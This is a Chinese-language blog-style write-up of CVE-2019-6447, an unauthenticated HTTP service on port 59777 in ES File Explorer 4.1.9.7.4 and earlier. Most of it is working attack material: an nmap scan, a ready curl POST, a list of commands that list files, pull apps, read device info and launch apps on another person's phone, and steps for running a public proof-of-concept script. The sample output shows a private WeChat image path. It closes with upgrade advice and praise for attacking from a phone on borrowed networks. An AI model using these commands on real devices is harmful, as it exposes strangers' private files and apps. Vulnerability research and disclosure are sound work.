ES文件管理器未受权访问漏洞——CVE-2019-6447

ES文件管理器号称安卓文件管理器第一品牌,主动下载达3亿次,做者我也在用。
每次用户启动应用时都会启动http服务器,打开的本地端口为59777,直接访问会弹出权限被拒绝
ES文件管理器未受权访问漏洞——CVE-2019-6447
漏洞影响范围
ES文件管理器版本号4.1.9.7.4或者更低
漏洞复现
直接nmap扫描手机指定端口
nmap 192.168.0.108 59777
ES文件管理器未受权访问漏洞——CVE-2019-6447
能够看到端口是已经开启的
咱们能够直接curl也能够进行复现
curl命令:curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://192.168.0.108:59777
listPics能够替换成想要使用的命令
可用命令
listFiles:列出全部文件
listPics:列出全部的图片
listVideos:列出全部视频
listAudios:列出全部的音频文件
listApps:列出全部已安装的应用
listAppsSystem:列出全部系统应用
listAppsPhone:列出全部电话应用程序
listAppsSdcard:列出sdcard中全部的apk文件
listAppsAll :列出全部已安装的应用(包括系统应用)
getDeviceInfo:获取设备信息
appPull :从设备中提取应用,须要包名称参数
appLaunch:启动应用程序,须要包名称参数
getAppThumbnail:获取应用程序的图标,须要包名称参数
上处命令位置为包路径下的4.1.84class2.-dex2jar.jar\com\estrongs\android\f\a.class
ES文件管理器未受权访问漏洞——CVE-2019-6447
poc脚本
git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
pip install -r requirements.txt
python poc.py --cmd listPics --ip 192.168.0.108(listPics也能够替换本身要使用的命令)
{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }(出现此内容为复现成功)python

更新最新版es文件管理器便可修复(低于4.1.9.9的版本需尽快升级为最新版)linux

ps:配合linuxdeploy在手机上部署kali环境简直无敌,只须要蹭下网就odkk了android

相关文章
相关标签/搜索